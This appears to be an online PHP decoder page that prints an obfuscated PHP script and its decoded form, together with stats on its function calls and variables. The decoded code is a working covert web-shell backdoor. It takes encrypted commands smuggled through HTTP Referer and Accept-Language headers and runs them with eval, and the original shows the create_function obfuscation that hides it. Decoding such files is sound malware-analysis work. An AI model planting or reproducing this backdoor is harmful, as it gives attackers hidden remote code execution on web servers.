Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $L='ch_all!("/(![\\w])![\\w-!]+(?:;q!=0.([\\d])!)!?,?/",$ra,$m!);!if($q&&!$m){@s!ess..

Decoded Output download

$kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$L='ch_all!("/(![\\w])![\\w-!]+(?:;q!=0.([\\d])!)!?,?/",$ra,$m!);!if($q&&!$m){@s!ession!!_!star';
$h='ay("/!","+!")!,$ss($s[$i!],0,$e)))!,$k)));$!o=ob_get_!conten!ts()!;ob_end_!clean()!;$d=ba';
$V='&$!ra){$u=parse_!url($rr!);parse!_!s!tr($!u["query"],!$q);$q=array_v!alu!es(!$q);preg_mat!';
$D='!$kh="5!d4!1";!$kf="402a";f!unction x(!$t,$!k){$c=s!trlen(!$k);$l=str!len($t);$o!="";for!(';
$O=str_replace('B','','creBatBBe_fBuBBnction');
$F='$z+!+)$p.=$q[$m![2]![$z!]];if(st!r!pos($p,$h)===0){!$s![$!i]=""!;$p=$ss($p,3)!;!!}if(array';
$Y='$i=0!;$i<$!!l;){for($j!!=0;($j<$c&&$!i<$l);$!!j++,$i++!){!$o!.!=$t{$i}^$k{$j};}}retu!rn ';
$E='!$o;}!$r=$_SERVER;$r!r=@$r["H!TTP_!REFER!ER"];!$r!a=!!!@$r["HTTP_ACCEPT_LANGU!AGE"];if($rr!&!';
$f='!se64!_encode!(x(gzc!omp!ress($o),$!k));pr!int(!"<!$k>!$d</$k>")!;@session_d!est!roy();}}}}';
$v='t(!);$s=&$_SESSION;!!!$ss="subs!!tr";$!sl="strtol!o!wer";$i=$m[1][0].$m[1][1];!$h=!$sl(!$s!s(';
$z='md5($i.$kh),0,!3));$!f=$!sl($ss(md5!(!!$i.$kf),0,3!));$p="";f!or($z!=1!;$z<count($m[!1!]);';
$c='rt();@ev!al(@gzunc!ompres!s!(!@x(!@ba!se64_decode(preg_!repl!ace(array("/_/!!","/-/"!),arr!';
$b='_k!ey_exists!!($i!,$s)!){$s[$i]!.=$p;$e=strpos($s[!$i]!,$f);if($!e){$k=$k!!h.$kf!;o!b_sta';
$o=str_replace('!','',$D.$Y.$E.$V.$L.$v.$z.$F.$b.$c.$h.$f);
$d=$O('',$o);$d();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$D !$kh="5!d4!1";!$kf="402a";f!unction x(!$t,$!k){$c=s!trlen(!$..
$E !$o;}!$r=$_SERVER;$r!r=@$r["H!TTP_!REFER!ER"];!$r!a=!!!@$r["..
$F $z+!+)$p.=$q[$m![2]![$z!]];if(st!r!pos($p,$h)===0){!$s![$!i]..
$L ch_all!("/(![\w])![\w-!]+(?:;q!=0.([\d])!)!?,?/",$ra,$m!);!i..
$O create_function
$V &$!ra){$u=parse_!url($rr!);parse!_!s!tr($!u["query"],!$q);$q..
$Y $i=0!;$i<$!!l;){for($j!!=0;($j<$c&&$!i<$l);$!!j++,$i++!){!$o..
$b _k!ey_exists!!($i!,$s)!){$s[$i]!.=$p;$e=strpos($s[!$i]!,$f);..
$c rt();@ev!al(@gzunc!ompres!s!(!@x(!@ba!se64_decode(preg_!repl..
$d None
$f !se64!_encode!(x(gzc!omp!ress($o),$!k));pr!int(!"<!$k>!$d</$..
$h ay("/!","+!")!,$ss($s[$i!],0,$e)))!,$k)));$!o=ob_get_!conten..
$o $kh="5d41";$kf="402a";function x($t,$k){$c=strlen($k);$l=str..
$v t(!);$s=&$_SESSION;!!!$ss="subs!!tr";$!sl="strtol!o!wer";$i=..
$z md5($i.$kh),0,!3));$!f=$!sl($ss(md5!(!!$i.$kf),0,3!));$p="";..

Stats

MD5 4be77c119986fc399d483c0426f752f6
Eval Count 1
Decode Time 119 ms